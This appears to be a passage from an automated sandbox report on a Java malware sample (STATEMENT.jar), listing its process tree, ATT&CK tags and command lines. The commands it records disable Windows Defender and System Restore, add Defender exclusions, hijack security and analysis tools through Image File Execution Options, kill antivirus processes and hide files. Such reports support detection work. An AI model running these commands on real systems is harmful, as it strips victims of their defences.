PID 4384 wrote to memory of 4452	4384	cmd.exe	358
PID 4384 wrote to memory of 4876	4384	cmd.exe	359
PID 4384 wrote to memory of 4876	4384	cmd.exe	359
PID 728 wrote to memory of 4396	728	java.exe	360
PID 728 wrote to memory of 4396	728	java.exe	360
PID 4396 wrote to memory of 4420	4396	cmd.exe	362
PID 4396 wrote to memory of 4420	4396	cmd.exe	362
PID 4396 wrote to memory of 4588	4396	cmd.exe	363
PID 4396 wrote to memory of 4588	4396	cmd.exe	363
PID 728 wrote to memory of 1764	728	java.exe	364
PID 728 wrote to memory of 1764	728	java.exe	364
PID 1764 wrote to memory of 928	1764	cmd.exe	366
PID 1764 wrote to memory of 928	1764	cmd.exe	366
PID 1764 wrote to memory of 4688	1764	cmd.exe	367
PID 1764 wrote to memory of 4688	1764	cmd.exe	367
PID 728 wrote to memory of 4820	728	java.exe	368
PID 728 wrote to memory of 4820	728	java.exe	368
PID 728 wrote to memory of 3416	728	java.exe	370
PID 728 wrote to memory of 3416	728	java.exe	370
PID 4820 wrote to memory of 4388	4820	cmd.exe	371
PID 4820 wrote to memory of 4388	4820	cmd.exe	371
PID 4820 wrote to memory of 4364	4820	cmd.exe	373
PID 4820 wrote to memory of 4364	4820	cmd.exe	373
PID 728 wrote to memory of 3644	728	java.exe	374
PID 728 wrote to memory of 3644	728	java.exe	374
PID 3644 wrote to memory of 4472	3644	cmd.exe	376
PID 3644 wrote to memory of 4472	3644	cmd.exe	376
PID 3644 wrote to memory of 4144	3644	cmd.exe	377
PID 3644 wrote to memory of 4144	3644	cmd.exe	377
PID 728 wrote to memory of 4448	728	java.exe	378
PID 728 wrote to memory of 4448	728	java.exe	378
PID 728 wrote to memory of 4088	728	java.exe	380
PID 728 wrote to memory of 4088	728	java.exe	380
PID 728 wrote to memory of 4824	728	java.exe	382
PID 728 wrote to memory of 4824	728	java.exe	382
PID 728 wrote to memory of 2388	728	java.exe	384
PID 728 wrote to memory of 2388	728	java.exe	384
PID 728 wrote to memory of 4536	728	java.exe	386
PID 728 wrote to memory of 4536	728	java.exe	386
PID 728 wrote to memory of 1772	728	java.exe	388
PID 728 wrote to memory of 1772	728	java.exe	388
PID 728 wrote to memory of 3948	728	java.exe	390
PID 728 wrote to memory of 3948	728	java.exe	390

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3508	attrib.exe
1356	attrib.exe
1588	attrib.exe
1724	attrib.exe
2868	attrib.exe
408	attrib.exe
3828	attrib.exe
3904	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\STATEMENT.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2404
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3852
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1000
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:2868
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:408
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3828
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3904
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:3508
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1356
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1588
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
  2⤵
  - Views/modifies file attributes
  PID:1724
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4144
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:3656
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:536
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2872
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:2396
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1576
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:2352
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1360
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:4180
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4200
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:4280
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4296
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:4396
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4392
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:4588
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4880
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:4172
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:5064
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2096
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4236
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3828
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1448
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1364
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2352
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4388
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4840
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:5044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1960
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3720
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1356
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:4156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2396
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:636
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4104
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:4604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4748
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:2716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4928
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3384
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:2100
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1952
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:3300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4328
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:3200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1536
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1724
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4396
- C:\Windows\System32\taskkill.exe
